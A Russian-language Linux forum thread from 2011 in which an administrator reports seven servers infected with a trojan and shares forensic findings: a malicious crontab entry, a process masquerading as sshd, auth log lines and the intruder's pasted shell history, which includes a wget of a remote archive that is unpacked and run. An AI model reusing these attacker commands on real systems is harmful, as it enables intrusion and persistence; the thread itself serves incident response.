форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форум Открытые системы на сервере (Мониторинг, логи / Linux)
Изначальное сообщение		[ Отслеживать ]

"серваки linux (gentoo и debian)  заразились троянами"	+/–
Сообщение от Леха123 on 12-Янв-11, 17:55
заразили мне   7 серваков ! на  4 стоит дебиан  на  3 - генту обнаружил случайно - перестали строиться графики  на одном из  серваков. оказывается эта падла  к crontab  отредактировала по своему. на серваках с генту -  доступ рута заблокирован.  на дебиане доступ рута есть но пароли огромные. все серваки имеют совершенно разное назначение. ftp и apache только  на одном из них.  остальные - nat , mail, днс  серваки ...  в общем   везде совершенно разные приложения запущены. на всех компах была создана папка  /mnt/muh в кронтабе написано вот  это * * * * * /mnt/muh/y2kupdate >/dev/null 2>&1 редактор vi  - "заботливо" удалён :) ps ax  не показал ничего подозрительного,  однако ps axww   показал вот это 23636 ?        S      0:24 /usr/sbin/sshd                                                                                                                                                                                                                        ? -d /mnt/muh в  /var/log/messages  вот это Jan  5 21:47:39 mail sudo:    moj_super_login : TTY=pts/8 ; PWD=/home/moj_super_login ; USER=root ; COMMAND=/bin/su Jan  5 21:47:39 mail su[28693]: Successful su for root by root Jan  5 21:47:39 mail su[28693]: + pts/8 root:root Jan  5 21:47:39 mail su[28693]: pam_unix(su:session): session opened for user root by moj_super_login(uid=0) в рунете почемуто мало информации об этой дряни... сижу... вычищаю порт ssh хочу поменять  и права доступа  перешерстить везде
Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "серваки linux (gentoo и debian)  заразились троянами"	+/–
Сообщение от emfs (ok) on 12-Янв-11, 18:04
А как такое могло произойти? Мож диверсия? Есть у тебя недруги?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	3. "серваки linux (gentoo и debian)  заразились троянами"	+/–
	Сообщение от Леха123 on 12-Янв-11, 18:48
	> А как такое могло произойти? > Мож диверсия? Есть у тебя недруги? думаю ... что.... эээ.. нет недругов...  :) если бы  диверсию делали бы, то могли бы  данные  поудалять или типа того... p.s. 2 сервака не тронули...  там red-hat
	Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "серваки linux (gentoo и debian)  заразились троянами"	+/–
Сообщение от Леха123 on 12-Янв-11, 18:07
вот  хистори   cat known_hosts ssh 212.33.18.246 ssh 212.33.18.246 -p 222 ssh 212.33.18.246 -p 222 -l moj_super_user ls -la /proc/*/exe locate vuln locate unix locate mech locate psybnc cat /usr/portage/net-irc/psybnc/files/psybnc.conf cd /mnt ls -la ls -la wget members.lycos.co.uk/place1/muh1.tgz tar zxvf muh1.tgz cd muh ./run /sbin/ifconfig rm -rf muh killall -9 muh ls -la cd .. cd muh ls -la cd .. ls -la rm -rf muh tar zxvf muh1.tgz cd muh nano miaurc ./run
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	4. "серваки linux (gentoo и debian)  заразились троянами"	+/–
	Сообщение от Square (ok) on 12-Янв-11, 18:56
	> wget members.lycos.co.uk/place1/muh1.tgz на эту штуку даже виндовый антивирь ругается :)
	Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

5. "серваки linux (gentoo и debian)  заразились троянами"	+/–
Сообщение от Леха123 on 12-Янв-11, 19:15
> ps ax  не показал ничего подозрительного,  однако > ps axww   показал вот это > 23636 ?        S   >    0:24 /usr/sbin/sshd       >             жаль  - не могу править свои сообщения.  процитированное выше следует читать вот так: ps axww   показал вот это 23636 ?        S   0:24 /usr/sbin/sshd       ? -d /mnt/muh
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема